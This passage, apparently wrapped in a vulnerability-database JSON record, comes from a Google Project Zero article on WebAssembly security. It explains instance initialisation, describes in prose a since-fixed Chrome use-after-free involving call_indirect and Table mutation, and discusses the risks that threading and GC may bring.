\n**\n\nAfter the imported objects are loaded, the WebAssembly engine goes through a few more steps to create the Instance Object. The Elements Section of the WebAssembly binary is used to initialize the Table object, if both of these exist, and then the Data Section of the WebAssembly binary is used to initialize the Memory object, if both exist. Then, the code in the Module is used to create functions, and these functions are exported (attached to a JavaScript object, so they are accessible in JavaScript). Finally, if a start function is specified in the Start Section, it is executed, and then the WebAssembly is ready to run!\n\n** \n**\n\nvar b2 = new ArrayBuffer(1000); \nvar view = new Int8Array(b2, 700); // offset \nvar mod = new WebAssembly.Module(a);\n\nvar i = new WebAssembly.Instance(m, imports);\n\ni.exports.call_me(); //WebAssembly happens!\n\n** \n**\n\nThe final [issue](<https://bugs.chromium.org/p/chromium/issues/detail?id=826434#c1>) we found involves a number of these components. It was discovered and fixed by the Chrome team before we found it, so it doesn\u2019t have a CVE, but it\u2019s still an interesting bug.\n\n** \n**\n\nThis issue is related to the call_indirect instruction which calls a function in the Table object. When the function in the Table object is called, the function can remove itself from the Table object during the call. Before this issue was fixed, Chrome relied on the reference to the function in the Table object to prevent it from being freed during garbage collection. So removing the function from the Table object during a call has the potential to cause the call to use freed memory when it unwinds.\n\n** \n**\n\nThis bug was originally fixed by preventing a Table object from being changed in JavaScript when a WebAssembly call was in progress. Unfortunately, this fix did not completely resolve the issue. Since it is possible to create a WebAssembly Instance in any function, it was still possible to change the Table object by creating an Instance that imports the Table object and has an underlying module with an Elements Section. When the new Instance is created, the Elements Section is used to initialize the Table, allowing the table to be changed without calling the JavaScript function to change a Table object. The issue was ultimately resolved by holding an extra reference to all needed objects for the duration of the call.\n\n### Execution\n\n** \n**\n\nWebAssembly is executed by calling an exported function. Depending on the engine, the intermediate bytecode generated when the Module was parsed is either interpreted or used to generate native code via JIT. It\u2019s not uncommon for WebAssembly engines to have bugs where the wrong code is generated for certain sequences of instructions; many such issues have been reported in the bugs trackers for the different engines. We didn\u2019t see any such bugs that had a clear security impact though.\n\n### The Future\n\n** \n**\n\nOverall, the majority of the bugs we found in WebAssembly were related to the parsing of WebAssembly binaries, and this has been mirrored in vulnerabilities reported by other parties. Also, compared to other recent browser features, surprisingly few vulnerabilities have been reported in it. This is likely due to the simplicity of the current design, especially with regards to memory management.\n\n** \n**\n\nThere are two emerging features of WebAssembly that are likely to have a security impact. One is [threading](<https://github.com/WebAssembly/threads>). Currently, WebAssembly only supports concurrency via JavaScript workers, but this is likely to change. Since JavaScript is designed assuming that this is the only concurrency model, WebAssembly threading has the potential to require a lot of code to be thread safe that did not previously need to be, and this could lead to security problems.\n\n \n\n\nWebAssembly [GC](<https://github.com/WebAssembly/gc>) is another potential feature of WebAssembly that could lead to security problems. Currently, some uses of WebAssembly have performance problems due to the lack of higher-level memory management in WebAssembly. For example, it is difficult to implement a performant Java Virtual Machine in WebAssembly. If WebAssembly GC is implemented, it will increase the number of applications that WebAssembly can be used for, but it will also make it more likely that vulnerabilities related to memory management will occur in both WebAssembly engines and applications written in WebAssembly. \n", "modified": "2018-08-16T00:00:00", "published": "2018-08-16T00:00:00", "id": "GOOGLEPROJECTZERO:9418CBB054BDA9E57D7F2E7ABF5F7BE0", "href": "https://googleprojectzero.blogspot.com/2018/08/the-problems-and-promise-of-webassembly.html", "type": "googleprojectzero", "title": "\nThe Problems and Promise of WebAssembly\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}